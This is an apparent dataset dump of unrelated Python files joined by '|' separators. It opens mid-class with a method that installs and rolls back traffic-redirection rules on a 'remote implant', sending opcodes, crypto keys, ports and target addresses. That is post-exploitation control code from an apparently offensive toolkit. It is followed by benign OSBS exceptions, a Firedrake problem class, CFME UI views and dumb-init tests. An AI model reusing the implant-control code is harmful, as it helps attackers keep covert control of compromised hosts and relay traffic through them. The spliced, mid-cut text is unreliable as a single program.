            return (1, "Local rule set")
    def add(self, addremote=1):
        """Install this rule: on the remote implant (opcode 0x23) when
        addremote is true, and always in the local redirector.

        Returns (status, message, AT_ip): status is the remote rule number
        (or 1 for a local-only rule) on success, 0 on failure; AT_ip is
        the 32-bit address returned by the implant, or 0.  If the local
        add fails after a successful remote add, the remote rule is
        rolled back (opcode 0x26) on a best-effort basis.
        """
        if self.added == 1:
            return (0, "Rule already exists", 0)
        AT_ip = 0
        if addremote:
            self.op = 0x23L
            self.data = struct.pack("!LLL",self.nextRule, self.longevity,\
                self.connection_timeout)
            # A_ip/T_ip are already packed byte strings; append raw.
            self.data = self.data + self.A_ip + self.T_ip
            self.data = self.data + struct.pack("!HHLLLLLHHHHHHL",self.flags,\
                (self.ttl_mod << 8 | self.proto), self.munge,\
                self.crypto_key[0],self.crypto_key[1],self.crypto_key[2],\
                self.crypto_key[3], self.ident, 0, self.A_port, \
                self.SA_port, self.T_port, self.ST_port, self.seq)
            self.Query()
            if self.op == 0x23L and self.res == 0x01L:
                # Reply layout: new remote rule number, then a 32-bit ip.
                self.remoteRuleNum = struct.unpack("!L", self.data[0:4])[0]
                AT_ip = struct.unpack("!L", self.data[4:8])[0]
                self.ST_ip = self.data[4:8]
                res = base.redir.redir(self.longevity,self.connection_timeout,\
                    self.ConvertIP(self.target.ip), \
                    self.T_ip,\
                    self.seq, self.munge, self.crypto_key, \
                    self.flags, self.A_port, self.SA_port,\
                    self.ident, self.proto)
                if res < 1:
                    # Local add failed: try to back out the remote rule.
                    self.op = 0x26L
                    self.data = struct.pack("!L",self.remoteRuleNum)
                    self.Query()
                    if self.op == 0x26L and self.res == 0x1L:
                        self.remoteRuleNum = None
                        return (0, "Local rule could not be added", AT_ip)
                    else:
                        return (0, "Local rule could not be added, remote rule may still exist", AT_ip)
                self.localRuleNum = res
                self.added = 1
                self.implant.rules.append(self)
                return (self.remoteRuleNum, "Rule %d added" %(self.remoteRuleNum), AT_ip)
            else:
                return (0, "Remote rule could not be added", AT_ip)
        else:
            # Local-only rule: no remote counterpart is created.
            self.remoteRuleNum = None
            res = base.redir.redir(self.longevity,self.connection_timeout,\
                self.ConvertIP(self.target.ip), \
                self.T_ip,\
                self.seq, self.munge, self.crypto_key, \
                self.flags, self.A_port, self.SA_port,\
                self.ident, self.proto)
            if res < 1:
                return (0, "Local rule could not be added", 0)
            self.added = 1
            self.localRuleNum = res
            return (1, "Local rule added", 0)
|
"""
Copyright (c) 2015 Red Hat, Inc
All rights reserved.
This software may be modified and distributed under the terms
of the BSD license. See the LICENSE file for details.
Exceptions raised by OSBS
"""
from traceback import format_tb
class OsbsException(Exception):
    """Base exception for OSBS, optionally wrapping a causing exception.

    When no message is supplied but a cause is, the cause's repr becomes
    the message.  The hand-rolled cause/traceback formatting only kicks in
    when the exception has no ``__context__`` attribute, i.e. on Python 2;
    Python 3 exceptions always carry ``__context__`` and use the defaults.
    """

    def __init__(self, message=None, cause=None, traceback=None):
        # Derive a message from the cause when none was given explicitly.
        if message is None and cause is not None:
            message = repr(cause)
        super(OsbsException, self).__init__(message)
        self.message = message
        self.cause = cause
        self.traceback = traceback

    def __str__(self):
        show_cause = (self.cause and self.traceback and
                      not hasattr(self, '__context__'))
        if not show_cause:
            return super(OsbsException, self).__str__()
        formatted_tb = "".join(format_tb(self.traceback))
        return ("%s\n\n" % self.message +
                "Original traceback (most recent call last):\n" +
                formatted_tb +
                "%r" % self.cause)

    def __repr__(self):
        if self.cause and not hasattr(self, '__context__'):
            return "OsbsException caused by %r" % self.cause
        return super(OsbsException, self).__repr__()
class OsbsResponseException(OsbsException):
    """Raised when OpenShift replies with a non-OK (non-200) HTTP status."""

    def __init__(self, message, status_code, *args, **kwargs):
        # Record the offending status, then delegate message handling.
        self.status_code = status_code
        super(OsbsResponseException, self).__init__(message, *args, **kwargs)
class OsbsNetworkException(OsbsException):
    """Raised for network-level failures while talking to a given URL."""

    def __init__(self, url, message, status_code, *args, **kwargs):
        # Keep the failing URL and status code around for callers.
        self.url = url
        self.status_code = status_code
        super(OsbsNetworkException, self).__init__(message, *args, **kwargs)
class OsbsValidationException(OsbsException):
    """Validation failure; adds no behavior over OsbsException."""
    pass
|
from firedrake import *
from firedrake.utils import cached_property
from abc import ABCMeta, abstractproperty
class Problem(object):
    """Abstract base class for a Firedrake model problem.

    Subclasses supply the variational-problem pieces (function space,
    solution function, forms ``a``/``L``, boundary conditions) on a unit
    square (2D) or unit cube (3D) mesh with N cells per edge, using
    simplicial or quadrilateral/extruded cells.

    NOTE(review): ``__metaclass__ = ABCMeta`` is Python-2-only syntax;
    under Python 3 it has no effect, so the abstractproperty stubs below
    would not be enforced -- confirm the intended Python version.
    """
    __metaclass__ = ABCMeta
    def __init__(self, N=None, degree=None, dimension=None,
                 quadrilaterals=False):
        super(Problem, self).__init__()
        # Polynomial degree of the discretization.
        self.degree = degree
        # Number of mesh cells per edge.
        self.N = N
        # Spatial dimension: 2 or 3.
        self.dim = dimension
        # Whether to use quadrilateral (or extruded-quad) cells.
        self.quads = quadrilaterals
    @property
    def comm(self):
        # The MPI communicator is taken from the mesh.
        return self.mesh.comm
    @cached_property
    def mesh(self):
        """Build (once) the unit square/cube mesh for this problem."""
        if self.dim == 2:
            return UnitSquareMesh(self.N, self.N, quadrilateral=self.quads)
        else:
            assert self.dim == 3
            if self.quads:
                # A 3D "quad" mesh is built by extruding a 2D quad mesh
                # through N layers of height 1/N (total height 1).
                base = UnitSquareMesh(self.N, self.N, quadrilateral=self.quads)
                return ExtrudedMesh(base, self.N, layer_height=1.0/self.N)
            else:
                return UnitCubeMesh(self.N, self.N, self.N)
    @abstractproperty
    def name(self):
        # Human-readable problem name.
        pass
    @abstractproperty
    def function_space(self):
        pass
    @abstractproperty
    def u(self):
        # The solution Function.
        pass
    @abstractproperty
    def a(self):
        # Bilinear form.
        pass
    @abstractproperty
    def L(self):
        # Linear form (right-hand side).
        pass
    @abstractproperty
    def bcs(self):
        # Boundary conditions.
        pass
    @cached_property
    def analytic_solution(self):
        """Reference solution exp(prod_i sin(pi*x_i)) used for error checks."""
        x = SpatialCoordinate(self.mesh)
        if self.dim == 2:
            return exp(sin(pi*x[0])*sin(pi*x[1]))
        else:
            assert self.dim == 3
            return exp(sin(pi*x[0])*sin(pi*x[1])*sin(pi*x[2]))
    def solver(self, parameters=None):
        """Return a LinearVariationalSolver for a/L/u with this problem's bcs."""
        # For the rebuilding of the Jacobian to record assembly time
        problem = LinearVariationalProblem(self.a, self.L, self.u,
                                           bcs=self.bcs,
                                           constant_jacobian=False)
        solver = LinearVariationalSolver(problem, solver_parameters=parameters)
        return solver
    @abstractproperty
    def output(self):
        pass
    @abstractproperty
    def err(self):
        pass
    @abstractproperty
    def true_err(self):
        pass
    @abstractproperty
    def sol(self):
        pass
|
# -*- coding: utf-8 -*-
from widgetastic.utils import VersionPick, Version
from widgetastic.widget import View, Text, ConditionalSwitchableView
from widgetastic_manageiq import PaginationPane
from widgetastic_patternfly import Dropdown, BootstrapSelect, FlashMessages
from cfme.base.login import BaseLoggedInPage
from widgetastic_manageiq import (BreadCrumb,
SummaryTable,
Button,
TimelinesView,
DetailsToolBarViewSelector,
ItemsToolBarViewSelector,
Checkbox,
Input,
Table,
BaseEntitiesView,
DynaTree,
BootstrapTreeview,
ProviderEntity,
BaseNonInteractiveEntitiesView)
from cfme.common.host_views import HostEntitiesView
class ProviderDetailsToolBar(View):
    """
    represents provider toolbar and its controls
    """
    monitoring = Dropdown(text='Monitoring')
    configuration = Dropdown(text='Configuration')
    reload = Button(title='Reload Current Display')
    policy = Dropdown(text='Policy')
    authentication = Dropdown(text='Authentication')
    # Switches the details page between Summary and Dashboard renderings.
    view_selector = View.nested(DetailsToolBarViewSelector)
class ProviderDetailsView(BaseLoggedInPage):
    """
    main Details page for a provider; concrete subclasses narrow
    is_displayed with their navigation path
    """
    title = Text('//div[@id="main-content"]//h1')
    breadcrumb = BreadCrumb(locator='//ol[@class="breadcrumb"]')
    flash = FlashMessages('.//div[@id="flash_msg_div"]/div[@id="flash_text_div" or '
                          'contains(@class, "flash_text_div")]')
    toolbar = View.nested(ProviderDetailsToolBar)
    # The page body swaps between the registered views below according to
    # the toolbar's view selector; bad references fall back to the default.
    contents = ConditionalSwitchableView(reference='toolbar.view_selector',
                                         ignore_bad_reference=True)
    @contents.register('Summary View', default=True)
    class ProviderDetailsSummaryView(View):
        """
        represents Details page when it is switched to Summary aka Tables view
        """
        properties = SummaryTable(title="Properties")
        status = SummaryTable(title="Status")
        relationships = SummaryTable(title="Relationships")
        overview = SummaryTable(title="Overview")
        smart_management = SummaryTable(title="Smart Management")
    @contents.register('Dashboard View')
    class ProviderDetailsDashboardView(View):
        """
        represents Details page when it is switched to Dashboard aka Widgets view
        """
        # todo: need to develop this page
        pass
    @property
    def is_displayed(self):
        # The breadcrumb title ends in "(Summary)" or "(Dashboard)"; when no
        # view selector is shown, the page is assumed to be in Summary mode.
        if (not self.toolbar.view_selector.is_displayed or
                self.toolbar.view_selector.selected == 'Summary View'):
            subtitle = 'Summary'
        else:
            subtitle = 'Dashboard'
        title = '{name} ({subtitle})'.format(name=self.context['object'].name,
                                             subtitle=subtitle)
        return (self.logged_in_as_current_user and
                self.breadcrumb.is_displayed and
                self.breadcrumb.active_location == title)
class InfraProviderDetailsView(ProviderDetailsView):
    """Details page for an Infrastructure provider."""

    @property
    def is_displayed(self):
        # Generic details checks plus the Infrastructure navigation path.
        if not super(InfraProviderDetailsView, self).is_displayed:
            return False
        expected_nav = ['Compute', 'Infrastructure', 'Providers']
        return self.navigation.currently_selected == expected_nav
class CloudProviderDetailsView(ProviderDetailsView):
    """Details page for a Cloud provider."""

    @property
    def is_displayed(self):
        # Generic details checks plus the Clouds navigation path.
        if not super(CloudProviderDetailsView, self).is_displayed:
            return False
        expected_nav = ['Compute', 'Clouds', 'Providers']
        return self.navigation.currently_selected == expected_nav
class MiddlewareProviderDetailsView(ProviderDetailsView):
    """Details page for a Middleware provider."""

    @property
    def is_displayed(self):
        # Generic details checks plus the Middleware navigation path.
        if not super(MiddlewareProviderDetailsView, self).is_displayed:
            return False
        expected_nav = ['Middleware', 'Providers']
        return self.navigation.currently_selected == expected_nav
class ProviderTimelinesView(TimelinesView, BaseLoggedInPage):
    """
    represents Timelines page
    """
    @property
    def is_displayed(self):
        # NOTE(review): 'TimelinesView.is_displayed' is read on the CLASS,
        # not via self; if it is a property this evaluates the property
        # object itself (always truthy) instead of running the check --
        # confirm this is intended.
        return (self.logged_in_as_current_user and
                self.navigation.currently_selected == ['Compute', 'Infrastructure', 'Providers'] and
                TimelinesView.is_displayed)
class InfraProvidersDiscoverView(BaseLoggedInPage):
    """
    Discover View from Infrastructure Providers page
    """
    title = Text('//div[@id="main-content"]//h1')
    # Provider types that can be selected for discovery.
    vmware = Checkbox('discover_type_virtualcenter')
    scvmm = Checkbox('discover_type_scvmm')
    rhevm = Checkbox('discover_type_rhevm')
    # IP range to scan: the four octets of the starting address and the
    # last octet of the ending address.
    from_ip1 = Input('from_first')
    from_ip2 = Input('from_second')
    from_ip3 = Input('from_third')
    from_ip4 = Input('from_fourth')
    to_ip4 = Input('to_fourth')
    start = Button('Start')
    cancel = Button('Cancel')
    @property
    def is_displayed(self):
        return (self.logged_in_as_current_user and
                self.navigation.currently_selected == ['Compute', 'Infrastructure', 'Providers'] and
                self.title.text == 'Infrastructure Providers Discovery')
class CloudProvidersDiscoverView(BaseLoggedInPage):
    """
    Discover View from Cloud Providers page
    """
    title = Text('//div[@id="main-content"]//h1')
    discover_type = BootstrapSelect('discover_type_selected')
    # Credential fields are swapped according to the chosen discovery type.
    fields = ConditionalSwitchableView(reference='discover_type')
    @fields.register('Amazon EC2', default=True)
    class Amazon(View):
        username = Input(name='userid')
        password = Input(name='password')
        confirm_password = Input(name='verify')
    @fields.register('Azure')
    class Azure(View):
        client_id = Input(name='client_id')
        client_key = Input(name='client_key')
        tenant_id = Input(name='azure_tenant_id')
        subscription = Input(name='subscription')
    start = Button('Start')
    cancel = Button('Cancel')
    @property
    def is_displayed(self):
        return (self.logged_in_as_current_user and
                self.navigation.currently_selected == ['Compute', 'Clouds', 'Providers'] and
                self.title.text == 'Cloud Providers Discovery')
class ProvidersManagePoliciesView(BaseLoggedInPage):
    """
    Provider's Manage Policies view
    """
    # The policy tree widget changed implementation in CFME 5.7.
    policies = VersionPick({Version.lowest(): DynaTree('protect_treebox'),
                            '5.7': BootstrapTreeview('protectbox')})
    @View.nested
    class entities(BaseNonInteractiveEntitiesView):  # noqa
        @property
        def entity_class(self):
            # Entity representation depends on the product version.
            return ProviderEntity().pick(self.browser.product_version)
    save = Button('Save')
    reset = Button('Reset')
    cancel = Button('Cancel')
    @property
    def is_displayed(self):
        # NOTE(review): always False -- this view is never positively
        # detected; confirm that is intentional.
        return False
class NodesToolBar(View):
    """
    represents nodes toolbar and its controls (exists for Infra OpenStack provider)
    """
    configuration = Dropdown(text='Configuration')
    policy = Dropdown(text='Policy')
    power = Dropdown(text='Power')
    download = Dropdown(text='Download')
    # Switches between list/grid/tile renderings of the nodes.
    view_selector = View.nested(ItemsToolBarViewSelector)
class ProviderNodesView(BaseLoggedInPage):
    """
    represents main Nodes view (exists for Infra OpenStack provider)
    """
    title = Text('//div[@id="main-content"]//h1')
    toolbar = View.nested(NodesToolBar)
    # Reuse the host entities (list/grid) widgets for the node listing.
    including_entities = View.include(HostEntitiesView, use_parent=True)
    @property
    def is_displayed(self):
        # Page title is "<provider name> (All Managed Hosts)".
        title = '{name} (All Managed Hosts)'.format(name=self.context['object'].name)
        return (self.logged_in_as_current_user and
                self.navigation.currently_selected == ['Compute', 'Infrastructure', 'Providers'] and
                self.title.text == title)
class ProviderToolBar(View):
    """
    represents provider toolbar and its controls
    """
    configuration = Dropdown(text='Configuration')
    policy = Dropdown(text='Policy')
    authentication = Dropdown(text='Authentication')
    download = Dropdown(text='Download')
    # Switches between list/grid/tile renderings of the providers.
    view_selector = View.nested(ItemsToolBarViewSelector)
class ProviderSideBar(View):
    """
    represents left side bar. it usually contains navigation, filters, etc
    (currently an empty placeholder)
    """
    pass
class ProviderEntitiesView(BaseEntitiesView):
    """Entities view specialized for provider entities."""

    @property
    def entity_class(self):
        # Pick the version-appropriate provider entity implementation.
        version = self.browser.product_version
        return ProviderEntity().pick(version)
class ProvidersView(BaseLoggedInPage):
    """
    represents Main view displaying all providers
    """
    @property
    def is_displayed(self):
        # Subclasses narrow this further (navigation path and page title).
        return self.logged_in_as_current_user
    paginator = PaginationPane()
    toolbar = View.nested(ProviderToolBar)
    sidebar = View.nested(ProviderSideBar)
    # Pull in the provider entities (list/grid) widgets.
    including_entities = View.include(ProviderEntitiesView, use_parent=True)
class ContainersProvidersView(ProvidersView):
    """Main view listing all Containers providers."""

    table = Table(locator="//div[@id='list_grid']//table")

    @property
    def is_displayed(self):
        if not super(ContainersProvidersView, self).is_displayed:
            return False
        expected_nav = ['Compute', 'Containers', 'Providers']
        return (self.navigation.currently_selected == expected_nav and
                self.entities.title.text == 'Containers Providers')
class InfraProvidersView(ProvidersView):
    """Main view listing all Infrastructure providers."""

    @property
    def is_displayed(self):
        if not super(InfraProvidersView, self).is_displayed:
            return False
        expected_nav = ['Compute', 'Infrastructure', 'Providers']
        return (self.navigation.currently_selected == expected_nav and
                self.entities.title.text == 'Infrastructure Providers')
class CloudProvidersView(ProvidersView):
    """Main view listing all Cloud providers."""

    @property
    def is_displayed(self):
        if not super(CloudProvidersView, self).is_displayed:
            return False
        expected_nav = ['Compute', 'Clouds', 'Providers']
        return (self.navigation.currently_selected == expected_nav and
                self.entities.title.text == 'Cloud Providers')
class MiddlewareProvidersView(ProvidersView):
    """Main view listing all Middleware providers."""

    @property
    def is_displayed(self):
        if not super(MiddlewareProvidersView, self).is_displayed:
            return False
        expected_nav = ['Middleware', 'Providers']
        return (self.navigation.currently_selected == expected_nav and
                self.entities.title.text == 'Middleware Providers')
class BeforeFillMixin(object):
    """Mixin that activates the appropriate tab before that tab is filled."""

    def before_fill(self):
        # Nothing to do when the tab is absent; otherwise click only if it
        # is not already the active one.
        if not self.exists:
            return
        if not self.is_active():
            self.select()
class ProviderAddView(BaseLoggedInPage):
    """
    represents Provider Add View; concrete subclasses add navigation and
    title checks to is_displayed
    """
    title = Text('//div[@id="main-content"]//h1')
    name = Input('name')
    prov_type = BootstrapSelect(id='emstype')
    zone = Input('zone')
    flash = FlashMessages('.//div[@id="flash_msg_div"]/div[@id="flash_text_div" or '
                          'contains(@class, "flash_text_div")]')
    add = Button('Add')
    cancel = Button('Cancel')
    @View.nested
    class endpoints(View):  # NOQA
        # this is switchable view that gets replaced with concrete view.
        # it gets changed according to currently chosen provider type
        # look at cfme.common.provider.BaseProvider.create() method
        pass
    @property
    def is_displayed(self):
        return self.logged_in_as_current_user
class InfraProviderAddView(ProviderAddView):
    """Add form for Infrastructure providers."""

    api_version = BootstrapSelect(id='api_version')  # only for OpenStack

    @property
    def is_displayed(self):
        if not super(InfraProviderAddView, self).is_displayed:
            return False
        expected_nav = ['Compute', 'Infrastructure', 'Providers']
        return (self.navigation.currently_selected == expected_nav and
                self.title.text == 'Add New Infrastructure Provider')
class CloudProviderAddView(ProviderAddView):
    """
    represents Cloud Provider Add View
    """
    # bug in cfme this field has different ids for cloud and infra add views
    prov_type = BootstrapSelect(id='ems_type')
    region = BootstrapSelect(id='provider_region')  # Azure/AWS/GCE
    tenant_id = Input('azure_tenant_id')  # only for Azure
    subscription = Input('subscription')  # only for Azure
    project_id = Input('project')  # only for Azure
    # bug in cfme this field has different ids for cloud and infra add views
    api_version = BootstrapSelect(id='ems_api_version')  # only for OpenStack
    keystone_v3_domain_id = Input('keystone_v3_domain_id')  # OpenStack only
    infra_provider = BootstrapSelect(id='ems_infra_provider_id')  # OpenStack only
    tenant_mapping = Checkbox(name='tenant_mapping_enabled')  # OpenStack only
    @property
    def is_displayed(self):
        return (super(CloudProviderAddView, self).is_displayed and
                self.navigation.currently_selected == ['Compute', 'Clouds', 'Providers'] and
                self.title.text == 'Add New Cloud Provider')
class ContainersProviderAddView(ProviderAddView):
    """
    represents Containers Provider Add View
    """
    prov_type = BootstrapSelect(id='ems_type')

    @property
    def is_displayed(self):
        # BUG FIX: previously super(ProviderAddView, self) was used, which
        # skipped ProviderAddView.is_displayed entirely and jumped straight
        # to its base class -- inconsistent with the Infra/Cloud/Middleware
        # sibling views, which all pass their own class to super().
        return (super(ContainersProviderAddView, self).is_displayed and
                self.navigation.currently_selected == ['Compute', 'Containers', 'Providers'] and
                self.title.text == 'Add New Containers Provider')
class MiddlewareProviderAddView(ProviderAddView):
    """Add form for Middleware providers."""

    @property
    def is_displayed(self):
        if not super(MiddlewareProviderAddView, self).is_displayed:
            return False
        expected_nav = ['Middleware', 'Providers']
        return (self.navigation.currently_selected == expected_nav and
                self.title.text == 'Add New Middleware Provider')
class ProviderEditView(ProviderAddView):
    """
    represents Provider Edit View; in edit mode the provider type is a
    read-only label rather than a select
    """
    prov_type = Text(locator='//label[@name="emstype"]')
    # only in edit view
    vnc_start_port = Input('host_default_vnc_port_start')
    vnc_end_port = Input('host_default_vnc_port_end')
    flash = FlashMessages('.//div[@id="flash_msg_div"]/div[@id="flash_text_div" or '
                          'contains(@class, "flash_text_div")]')
    save = Button('Save')
    reset = Button('Reset')
    cancel = Button('Cancel')
    @property
    def is_displayed(self):
        return self.logged_in_as_current_user
class InfraProviderEditView(ProviderEditView):
    """Edit form for Infrastructure providers."""

    @property
    def is_displayed(self):
        if not super(InfraProviderEditView, self).is_displayed:
            return False
        expected_nav = ['Compute', 'Infrastructure', 'Providers']
        return (self.navigation.currently_selected == expected_nav and
                self.title.text == 'Edit Infrastructure Provider')
class CloudProviderEditView(ProviderEditView):
    """Edit form for Cloud providers."""

    @property
    def is_displayed(self):
        if not super(CloudProviderEditView, self).is_displayed:
            return False
        expected_nav = ['Compute', 'Clouds', 'Providers']
        return (self.navigation.currently_selected == expected_nav and
                self.title.text == 'Edit Cloud Provider')
class ContainersProviderEditView(ProviderEditView):
    """
    represents Containers Provider Edit View
    """
    @property
    def is_displayed(self):
        # BUG FIX: previously super(ProviderEditView, self) was used, which
        # skipped ProviderEditView.is_displayed entirely and jumped straight
        # to its base class -- inconsistent with the Infra/Cloud/Middleware
        # sibling views, which all pass their own class to super().
        return (super(ContainersProviderEditView, self).is_displayed and
                self.navigation.currently_selected == ['Compute', 'Containers', 'Providers'] and
                self.title.text == 'Edit Containers Provider')
class MiddlewareProviderEditView(ProviderEditView):
    """Edit form for Middleware providers; page title embeds the name."""

    @property
    def is_displayed(self):
        name = self.context['object'].name
        expected_title = "Edit Middleware Providers '{name}'".format(name=name)
        if not super(MiddlewareProviderEditView, self).is_displayed:
            return False
        return (self.navigation.currently_selected == ['Middleware', 'Providers'] and
                self.title.text == expected_title)
|
import signal
import sys
from subprocess import Popen
import pytest
@pytest.mark.parametrize('exit_status', [0, 1, 2, 32, 64, 127, 254, 255])
@pytest.mark.usefixtures('both_debug_modes', 'both_setsid_modes')
def test_exit_status_regular_exit(exit_status):
    """dumb-init should exit with the same exit status as the process that it
    supervises when that process exits normally.
    """
    proc = Popen(('dumb-init', 'sh', '-c', 'exit {}'.format(exit_status)))
    # wait() populates returncode with the child's exit status.
    proc.wait()
    assert proc.returncode == exit_status
@pytest.mark.parametrize(
    'signal', [
        signal.SIGTERM,
        signal.SIGHUP,
        signal.SIGQUIT,
        signal.SIGKILL,
    ],
)
@pytest.mark.usefixtures('both_debug_modes', 'both_setsid_modes')
def test_exit_status_terminated_by_signal(signal):
    """dumb-init should exit with status 128 + signal when the child process is
    terminated by a signal.

    Note: the parameter deliberately shadows the ``signal`` module inside
    this function; the signal numbers were already captured at decoration
    time, and only the integer value is used here.
    """
    # We use Python because sh is "dash" on Debian and "bash" on others.
    # https://github.com/Yelp/dumb-init/issues/115
    proc = Popen((
        'dumb-init', sys.executable, '-c', 'import os; os.kill(os.getpid(), {})'.format(
            signal,
        ),
    ))
    proc.wait()
    # POSIX convention: death by signal N is reported as exit status 128+N.
    assert proc.returncode == 128 + signal
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.